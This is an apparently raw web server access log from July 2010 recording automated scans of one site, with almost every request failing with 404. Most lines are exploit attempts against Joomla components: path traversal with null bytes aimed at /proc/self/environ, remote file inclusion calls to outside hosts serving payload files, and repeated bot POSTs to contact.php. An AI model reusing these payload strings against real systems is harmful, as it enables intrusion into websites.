88.198.19.38 - - [01/Jul/2010:05:21:58 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:58 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
88.198.19.38 - - [01/Jul/2010:05:21:58 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.110.147.156 - - [01/Jul/2010:05:22:01 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
89.110.147.156 - - [01/Jul/2010:05:22:02 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.110.147.156 - - [01/Jul/2010:05:22:02 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
89.110.147.156 - - [01/Jul/2010:05:22:46 -0500] "GET /logs/access_log.1277164800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
64.120.225.202 - - [01/Jul/2010:05:22:46 -0500] "GET /logs/access_log.1277164800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
89.110.147.156 - - [01/Jul/2010:05:23:53 -0500] "GET /logs/access_log.1277164800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
219.240.36.36 - - [01/Jul/2010:05:24:02 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
77.250.23.195 - - [01/Jul/2010:05:24:55 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:58 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:24:58 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:25:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
77.250.23.195 - - [01/Jul/2010:05:25:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
217.73.239.6 - - [01/Jul/2010:05:25:20 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.807"
221.144.12.141 - - [01/Jul/2010:05:25:20 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.79"
217.73.239.6 - - [01/Jul/2010:05:25:20 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.807"
217.73.239.6 - - [01/Jul/2010:05:25:21 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.807"
173.236.139.35 - - [01/Jul/2010:05:25:57 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
64.151.192.11 - - [01/Jul/2010:05:27:22 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:27:23 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:27:27 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
173.236.139.35 - - [01/Jul/2010:05:28:38 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
221.144.12.141 - - [01/Jul/2010:05:28:43 -0500] "GET /logs/access_log.1276473600/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.79"
221.144.12.141 - - [01/Jul/2010:05:28:44 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.79"
221.144.12.141 - - [01/Jul/2010:05:28:44 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
221.144.12.141 - - [01/Jul/2010:05:29:11 -0500] "GET /logs/access_log.1275696000/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.79"
195.56.111.226 - - [01/Jul/2010:05:29:52 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:52 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:53 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:54 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:54 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:54 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:54 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.56.111.226 - - [01/Jul/2010:05:29:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
64.151.192.11 - - [01/Jul/2010:05:30:14 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:30:15 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:30:24 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:32:06 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:32:07 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
195.190.166.35 - - [01/Jul/2010:05:32:48 -0500] "GET /logs/access_log.1276041600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
195.190.166.35 - - [01/Jul/2010:05:32:48 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
195.190.166.35 - - [01/Jul/2010:05:32:48 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
80.74.153.40 - - [01/Jul/2010:05:33:18 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:33:18 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:33:18 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:33:22 -0500] "GET //index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
217.73.239.6 - - [01/Jul/2010:05:33:24 -0500] "GET //index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.807"
87.250.255.243 - - [01/Jul/2010:05:34:01 -0500] "GET /memorial/ HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
38.113.115.196 - - [01/Jul/2010:05:34:13 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:34:13 -0500] "GET //index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:34:13 -0500] "GET /logs//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
121.78.118.123 - - [01/Jul/2010:05:34:13 -0500] "GET /logs/access_log.1276300800//index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.78.118.123 - - [01/Jul/2010:05:34:14 -0500] "GET //index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [01/Jul/2010:05:34:14 -0500] "GET /logs//index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
38.113.115.196 - - [01/Jul/2010:05:35:16 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:35:17 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:35:17 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
80.74.153.40 - - [01/Jul/2010:05:35:32 -0500] "GET /logs//index2.php?option=com_alphauserpoints&view=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
80.74.153.40 - - [01/Jul/2010:05:35:32 -0500] "GET /logs/access_log.1274832000%20%20//index2.php?option=com_alphauserpoints&view=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.74.153.40 - - [01/Jul/2010:05:35:32 -0500] "GET //index2.php?option=com_alphauserpoints&view=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
219.240.36.36 - - [01/Jul/2010:05:35:47 -0500] "GET /logs/access_log.1277424000/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.65"
219.240.36.36 - - [01/Jul/2010:05:35:48 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
219.240.36.36 - - [01/Jul/2010:05:35:48 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
217.73.239.6 - - [01/Jul/2010:05:36:48 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.807"
217.73.239.6 - - [01/Jul/2010:05:36:49 -0500] "GET //index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.807"
217.73.239.6 - - [01/Jul/2010:05:36:49 -0500] "GET /logs//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.807"
80.74.153.40 - - [01/Jul/2010:05:40:15 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:40:15 -0500] "GET //index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.74.153.40 - - [01/Jul/2010:05:40:15 -0500] "GET /logs//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
38.113.115.196 - - [01/Jul/2010:05:40:52 -0500] "GET /logs/access_log.1275868800//index2.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:40:52 -0500] "GET //index2.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:40:52 -0500] "GET /logs//index2.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:43:05 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:43:12 -0500] "GET /logs/access_log.1275868800//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:43:12 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:43:12 -0500] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:43:46 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:43:46 -0500] "GET //index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:43:46 -0500] "GET /logs//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:43:59 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
64.151.192.11 - - [01/Jul/2010:05:44:21 -0500] "GET /logs/access_log.1277424000/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:44:21 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:44:21 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [01/Jul/2010:05:44:25 -0500] "GET /logs/access_log.1276300800//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.78.118.123 - - [01/Jul/2010:05:44:25 -0500] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [01/Jul/2010:05:44:26 -0500] "GET /logs//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.73.239.6 - - [01/Jul/2010:05:44:43 -0500] "GET /logs/access_log.1276300800//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.807"
38.113.115.196 - - [01/Jul/2010:05:45:50 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:45:50 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
38.113.115.196 - - [01/Jul/2010:05:45:50 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
219.240.36.36 - - [01/Jul/2010:05:46:17 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
38.113.115.196 - - [01/Jul/2010:05:46:23 -0500] "GET /logs/access_log.1276300800//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:00 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [01/Jul/2010:05:47:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
80.74.153.40 - - [01/Jul/2010:05:47:59 -0500] "GET /logs/access_log.1276300800//index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
38.113.115.196 - - [01/Jul/2010:05:48:05 -0500] "GET /logs/access_log.1276300800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
219.240.36.36 - - [01/Jul/2010:05:49:44 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
219.240.36.36 - - [01/Jul/2010:05:49:45 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.65"
67.195.112.180 - - [01/Jul/2010:05:50:15 -0500] "GET /logs/access_log.1264464000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.151.192.11 - - [01/Jul/2010:05:50:51 -0500] "GET /logs/access_log.1276214400/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:50:51 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:50:51 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:05:50:52 -0500] "GET /logs/access_log.1275091200/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
119.63.198.50 - - [01/Jul/2010:05:53:28 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 200 524288 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
174.142.75.205 - - [01/Jul/2010:05:53:44 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:05:53:44 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:05:53:44 -0500] "GET /logs/access_log.1277164800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
67.195.112.180 - - [01/Jul/2010:05:53:46 -0500] "GET /logs/access_log.1160438400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.74.153.40 - - [01/Jul/2010:05:57:06 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.73.239.6 - - [01/Jul/2010:05:57:12 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
80.74.153.40 - - [01/Jul/2010:05:57:25 -0500] "GET //index.php?option=com_alphauserpoints&view=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
80.74.153.40 - - [01/Jul/2010:05:57:25 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
80.74.153.40 - - [01/Jul/2010:05:57:25 -0500] "GET /logs/access_log.1274832000%20%20//index.php?option=com_alphauserpoints&view=http://myslowice.activh.pl//news//inc/test/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
